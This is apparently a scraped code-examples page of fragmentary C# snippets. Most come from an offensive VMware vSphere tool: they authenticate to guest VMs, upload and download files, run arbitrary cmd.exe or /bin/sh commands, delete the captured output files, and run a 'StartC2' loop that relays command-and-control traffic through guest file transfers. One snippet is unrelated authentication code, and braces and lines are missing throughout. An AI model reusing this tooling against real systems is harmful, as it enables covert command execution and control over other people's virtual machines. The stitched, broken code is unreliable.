Beispiel #1
 static void UploadFile(GuestAuthentication creds, string source, string destination)
         byte[] data            = System.IO.File.ReadAllBytes(source);
         var    fileTransferUrl = vim.InitiateFileTransferToGuest(guestFileManager, vm, creds, destination, new GuestFileAttributes(), data.Length, true);
         using (var client = new System.Net.WebClient())
             client.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore);
             Log("[x] Starting upload of " + source + " to " + destination + "...");
             client.UploadFile(fileTransferUrl, "PUT", source);
             Log("[x] Uploaded " + source + " to " + destination + " on the guest");
     catch (Exception fault)
Beispiel #2
        static int Execute(ExecuteOptions options)
                //Connect to target VM
                Connect(options.url, options.username, options.password, options.ip);

                //Build credential object to authenticate to guest OS
                if (options.guestusername == null && options.guestpassword == null)
                    Log("[x] Authenticating to guest using pass through authentication (SSPI)");
                    string host      = GetProperty <GuestInfo>(vm, "guest").hostName;
                    string domain    = Environment.UserDomainName;
                    string principal = "host/" + host + "@" + domain;
                    creds = GuestAuth(GetSspiToken(principal));
                    Log("[x] Authenticating to guest using provided username and password");
                    creds = new NamePasswordAuthentication()
                        username           = options.guestusername,
                        password           = options.guestpassword,
                        interactiveSession = false,

                if (options.linux)
                    ExecuteCommand(creds, "-c " + options.command, @"/bin/sh", options.outputDir == null ? "/tmp" : options.outputDir, options.output, options.linux);
                    ExecuteCommand(creds, "/c " + options.command, @"C:\Windows\System32\cmd.exe", options.outputDir == null ? @"C:\Windows\Temp" : options.outputDir, options.output, options.linux);
            catch (Exception fault)
Beispiel #3
        static GuestAuthentication GuestAuth()
            GuestAuthentication guestAuth = new GuestAuthentication()
                interactiveSession = false,
            ManagedObjectReference guestAuthManager = GetProperty <ManagedObjectReference>(serviceContent.guestOperationsManager, "authManager");

                vim.AcquireCredentialsInGuest(guestAuthManager, vm, guestAuth, 0);
            catch (Exception e)

Beispiel #4
 static int Download(DownloadOptions options)
         //Connect to target VM
         Connect(options.url, options.username, options.password, options.ip);
         //Build credential object to authenticate to guest OS
         creds = new NamePasswordAuthentication()
             username           = options.guestusername,
             password           = options.guestpassword,
             interactiveSession = false,
         DownloadFile(creds, options.source, options.destination);
     catch (Exception fault)
Beispiel #5
        private Authentication GetAuthenticationScheme()
            Authentication result = null;

            if (IsGuest(Identifier))
                result = new GuestAuthentication();

            if (Password != null)
                result = new PlainAuthentication()
                    Password = Password

            if (AccessKey != null)
                result = new KeyAuthentication {
                    Key = AccessKey

            if (Token != null && Issuer != null)
                result = new ExternalAuthentication {
                    Token = Token, Issuer = Issuer

            if (result == null)
                throw new InvalidOperationException(
                          $"A password or accessKey should be defined. Please use the '{nameof(UsingPassword)}' or '{nameof(UsingAccessKey)}' methods for that.");

Beispiel #6
        //WIP for SSO auth

        /*private static byte[] GetSSPIToken(string packageName)
         * {
         *  ClientCurrentCredential clientCred = null;
         *  ClientContext client = null;
         *  ServerCurrentCredential serverCred = null;
         *  ServerContext server = null;
         *  byte[] clientToken;
         *  byte[] serverToken;
         *  SecurityStatus clientStatus;
         *  try
         *  {
         *      clientCred = new ClientCurrentCredential(packageName);
         *      serverCred = new ServerCurrentCredential(packageName);
         *      Console.Out.WriteLine(clientCred.PrincipleName);
         *      client = new ClientContext(
         *          clientCred,
         *          serverCred.PrincipleName, ContextAttrib.Zero
         *      );
         *      server = new ServerContext(
         *          serverCred, ContextAttrib.Zero
         *      );
         *      clientToken = null;
         *      serverToken = null;
         *      clientStatus = client.Init(serverToken, out clientToken);
         *  }
         *  finally
         *  {
         *      if (server != null)
         *      {
         *          server.Dispose();
         *      }
         *      if (client != null)
         *      {
         *          client.Dispose();
         *      }
         *      if (clientCred != null)
         *      {
         *          clientCred.Dispose();
         *      }
         *      if (serverCred != null)
         *      {
         *          serverCred.Dispose();
         *      }
         *  }
         *  return clientToken;
         * }*/
        static void ExecuteCommand(GuestAuthentication creds, string arguments, string programPath, string workingDirectory, bool output)
                ManagedObjectReference processManager = GetProperty <ManagedObjectReference>(serviceContent.guestOperationsManager, "processManager");

                var guestProgramSpec = new GuestProgramSpec()
                    arguments        = arguments,
                    programPath      = programPath,
                    workingDirectory = workingDirectory,

                if (output)
                    //Set file to receive output
                    var outfile = Path.GetRandomFileName();
                    guestProgramSpec.arguments += @" > C:\Users\Public\" + outfile + @" 2>&1";

                    //Start the program and receive the PID back
                    Log("[x] Attempting to run cmd with the following arguments: " + guestProgramSpec.arguments);
                    Log(@"[x] Temporarily saving out to C:\Users\Public\" + outfile);
                    long pid = vim.StartProgramInGuest(processManager, vm, creds, guestProgramSpec);

                    //Display PID
                    Log("[x] Process started with PID " + pid + " waiting for execution to finish");

                    bool finished = false;
                    while (!finished)
                        //Get status of our process
                        long[]             pids             = { pid };
                        GuestProcessInfo[] guestProcessInfo = vim.ListProcessesInGuest(processManager, vm, creds, pids);
                        if (guestProcessInfo.Length == 0)
                            Log("Error retrieving status of the process, check for the existance of the output file manually");
                        if (guestProcessInfo[0].exitCodeSpecified)
                            Log("[x] Execution finished, attempting to retrieve the results");
                            //Get the results
                            var fileTransferInformation = vim.InitiateFileTransferFromGuest(guestFileManager, vm, creds, @"C:\Users\Public\" + outfile);
                            using (var client = new System.Net.WebClient())
                                client.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore);
                                var results = client.DownloadString(fileTransferInformation.url);
                                Log("[x] Output: ");

                            //Delete the file
                            vim.DeleteFileInGuest(guestFileManager, vm, creds, @"C:\Users\Public\" + outfile);
                            Log("[x] Output file deleted");

                            finished = true;
                    //Start the program and receive the PID back
                    Log("[x] Attempting to execute with cmd /c the following command: " + guestProgramSpec.arguments);
                    long pid = vim.StartProgramInGuest(processManager, vm, creds, guestProgramSpec);

                    //Display PID
                    Log("[x] Process started with PID" + pid);
            catch (Exception fault)
Beispiel #7
        static int StartC2(C2Options options)
                //Connect to target VM
                Connect(options.url, options.username, options.password, options.ip);
                //Build credential object to authenticate to guest OS
                creds = new NamePasswordAuthentication()
                    username           = options.guestusername,
                    password           = options.guestpassword,
                    interactiveSession = false,

                if (!Directory.Exists(options.localdir))
                    Error(new Exception("Cannot read local dir " + options.localdir));

                //Make sure paths have a trailing slash
                if (!options.localdir.EndsWith("\\"))
                    options.localdir += "\\";
                if (!options.guestdir.EndsWith("\\"))
                    options.guestdir += "\\";
                while (true)
                    string[] sourceFilePaths = Directory.GetFiles(options.localdir);
                    if (!Array.Exists(sourceFilePaths, element => element.Contains("lock")) && Array.Exists(sourceFilePaths, element => element.Contains(options.outputid)))
                        foreach (string sourceFilePath in sourceFilePaths)
                            var    fileName        = Path.GetFileName(sourceFilePath);
                            byte[] data            = System.IO.File.ReadAllBytes(sourceFilePath);
                            var    newFilePath     = options.guestdir + fileName;
                            var    fileTransferUrl = vim.InitiateFileTransferToGuest(guestFileManager, vm, creds, newFilePath + ".lock", new GuestFileAttributes(), data.Length, true);
                            using (var client = new System.Net.WebClient())
                                client.UploadData(fileTransferUrl, "PUT", data);
                                Log("[x] Uploaded a packet to guest");
                            vim.MoveFileInGuest(guestFileManager, vm, creds, newFilePath + ".lock", newFilePath, true);
                    GuestListFileInfo guestFilesRaw = vim.ListFilesInGuest(guestFileManager, vm, creds, options.guestdir, 0, 999, options.inputid + "*");
                    if (guestFilesRaw.files != null)
                        bool lockFilePresent = false;

                        foreach (GuestFileInfo guestFile in guestFilesRaw.files)
                            if (guestFile.path.Contains("lock"))
                                lockFilePresent = true;
                        if (!lockFilePresent)
                            foreach (GuestFileInfo guestFile in guestFilesRaw.files)
                                if (guestFile.type == "file" && !guestFile.path.Contains("lock"))
                                    var    fileTransferInformation = vim.InitiateFileTransferFromGuest(guestFileManager, vm, creds, options.guestdir + guestFile.path);
                                    string newFilePath             = options.localdir + guestFile.path;
                                    using (var client = new System.Net.WebClient())
                                        Log("[x] Downloading a packet from guest");
                                        client.DownloadFile(fileTransferInformation.url, newFilePath + @".lock");
                                    File.Move(newFilePath + @".lock", newFilePath);
                                    vim.DeleteFileInGuest(guestFileManager, vm, creds, options.guestdir + guestFile.path);
            catch (Exception fault)